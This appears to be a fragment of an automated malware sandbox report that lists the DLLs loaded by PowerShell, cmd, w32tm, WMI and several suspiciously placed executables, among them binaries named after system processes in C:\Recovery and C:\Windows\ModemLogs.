                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: apphelp.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: version.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: wldp.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: sspicli.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: mscoree.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: version.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: uxtheme.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: windows.storage.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: wldp.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: profapi.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: cryptsp.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: rsaenh.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: cryptbase.dll
                              Source: C:\Program Files\Windows Portable Devices\backgroundTaskHost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: mscoree.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: apphelp.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: version.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: wldp.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: profapi.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: sspicli.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: mscoree.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: version.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: wldp.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: profapi.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\ModemLogs\conhost.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: apphelp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                              Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: mscoree.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: version.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: wldp.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: profapi.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\Desktop\s5duotgoYD.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: apphelp.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: version.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: wldp.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: profapi.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: logoncli.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: netutils.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntmarta.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: ntdsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: mswsock.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: dnsapi.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: rasadhlp.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: fwpuclnt.dll
                              Source: C:\Windows\System32\w32tm.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: version.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: wldp.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: profapi.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\xKVBpkhCEjg.exeSection loaded: sspicli.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: version.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: wldp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: profapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: ktmw32.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: wbemcomn.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: amsi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: userenv.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: iphlpapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: dnsapi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: winnsi.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rasapi32.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rasman.dll
                              Source: C:\Recovery\RuntimeBroker.exeSection loaded: rtutils.dll
